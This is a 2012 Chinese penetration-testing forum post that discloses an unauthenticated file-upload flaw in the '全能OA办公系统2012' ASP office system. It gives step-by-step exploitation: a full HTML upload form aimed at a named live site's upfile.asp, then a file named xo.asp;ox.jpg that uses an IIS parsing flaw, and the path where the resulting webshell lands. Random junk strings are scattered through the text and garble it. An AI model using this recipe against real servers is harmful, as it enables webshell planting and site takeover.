中国网络渗透测试联盟

标题: 全能OA办公系统0day OA办公系统漏洞 上传漏洞 [打印本页]

---

作者: admin    时间: 2012-11-21 13:45
标题: 全能OA办公系统0day OA办公系统漏洞 上传漏洞
全能OA办公系统 上传漏洞
​
系统介绍：

全能OA办公系统2012是功能非常强大的OA系统，目前功能已完全能满足日常办公需要。
8 s$ d+ @$ F# q4 s- v# z$ a
6 i( v7 H, T5 N+ g主要功能：
6 |- a- ~. K) E# x2 q, Z4 D2 G$ O公司通告
. K, V+ o. e) T- Z% z工作计划
通讯助理
8 K. c" _7 e6 i- z0 B( w7 d0 R客户资源
我的公文
公文传阅
公共资源
资源预约
今日考勤
$ J# g$ x: t  X, B0 S: G个人计划
个人通讯录
个人基本档案
未读邮件
4 X- u/ v% p0 m! ?发邮件
  X) N! B6 V# u6 e( F& G收件夹
寄件夹
# W! [  z- j: V. `# e网络硬盘
3 ?/ i; r3 S5 \! l' G网络会议
网络调查
6 l# Q$ h5 \3 n1 H9 k2 o交流论坛

有兴趣测试的朋友可以下源码看看

源码下载：

http://www.mycodes.net/30/4750.htm
: v3 k  e" T( B
! r% y4 n, W" v- l  a漏洞介绍：

由upfile.asp上传文件漏洞引起
. a2 Y$ k  Q8 B3 t! t8 c
测试方法：

* n# z* l$ F. p2 Z$ p使用名小子上传http://www.itlynn.com/upfile.asp即可
6 L0 X4 ^% B7 p3 u; T9 ?4 j* M) z
如果upfile.asp文件被删除不存在。

$ h+ D, D, w6 r. P0 J- E  那么可以试着访问http://www.itlynn.com/upfile/upfile.asp 。

如果存在那么将如下代码保存为upfile.html。
; W( [- c0 s# e: H& L" O4 `- ^3 o
3 H% y* b) Y. J* j  A- x然后将action的参数修改为目标站点的url。例如 http://www.itlynn.com/upfile/upfile.asp。

5 ?8 q/ m* w* a3 `4 V

01 <table border='0' align="center" cellpadding="5">

( S1 ?* @% \# \, T02 <form method="POST"action="http://www.itlynn.com/upfile/upfile.asp"enctype="multipart/form-data"id="form1"name="form1">
" R5 Z3 `( @8 n. A2 P# L
0 d6 K% F; R+ F' w4 ~% T- \8 }03 <tr>
  W3 m% r% f: |1 U) k  X
04             <td>报错：</td>

05             <td><input type='radio' name='errnumber' value='0'>

  W4 v5 \+ S. h2 m3 @& c/ l  i7 ]06               自动更名
6 ^+ I7 P# j# M8 w0 c
" h3 L, R# ^$ h# M" K$ F0 }" Z07               <input type='radio' name='errnumber' value='1' checked>
, \$ x3 m- n5 N  n5 X
* I; p: O/ N$ `) k% }: j) ?9 _08               报错方式
1 k+ U1 X% _% o  f4 h. g
09               <input type='radio' name='errnumber' value='2'>

6 {  {# C+ Q8 L; T7 \10               直接覆盖</td>
# c( W' E0 j: n" S& M0 R+ Z
8 m2 r. i; E1 O7 r6 p, X11           </tr>

" ]0 L3 u+ t* R3 Y0 h12           <tr>
; q# b$ \" B% J# t! C; Y
13             <td>主题：</td>
& o- h' I( }  a; a3 _
14             <td><input type='text' name='filename' size='30'></td>
/ }+ P6 K1 m6 [( Y: g
5 n4 D/ y' x* b' p* k% F5 @* `15           </tr>
: Q) D# H+ U7 B) \
  w7 ^# ~6 J9 _, P& f2 q6 ^6 \; w16           <tr>

; v( o7 |1 `6 N. \17             <td>文件：</td>

/ b' J7 g: ^+ N# P5 {; M18             <td><input type="file"name="fruit"size="30"></td>
2 ~  F  f$ C$ Z- T1 t8 l
19           </tr>
: u& s. r1 D2 p- S; d! P
20           <tr>
' Y9 K0 Z3 H, @2 N
: N+ G  \2 X" D4 g! u& P21             <td valign='top'>简介：</td>
+ O8 u+ K* U2 w/ A+ r/ H
22             <td><textarea name='fileExt' cols='40' rows='5'></textarea></td>

, W! I( X6 B. k3 l23           </tr>
! o) v6 J0 o* m0 V0 p( E( k3 `
24   

25             <td colspan='2'><input type="submit" value="上传文件" name="subbutt"></td>
& f# [% Y# m. g  \8 g& s
" q8 d# F" R9 W) e0 b1 Y0 \/ D26           </tr>
1 Q8 ?( A( N' m% }- u! _0 ]
27         </form>
. J& w+ D: O1 {% c9 k) z2 _
然后打开上传一个文件名为xo.asp;ox.jpg的文件。


% K7 Y6 J% H1 ^5 |
  B5 c- B( o0 L: z# g3 M& a% h1 W上传成功后，马的路径是：http://www.itlynn.com/upfile/savepath/xo.asp;ox.jpg

# Q' P' \: q' K5 Y2 F此漏洞需要配合解析漏洞利用。
- M2 A: F: A  Q& ~1 s4 ]* B

---

欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)

Powered by Discuz! X3.2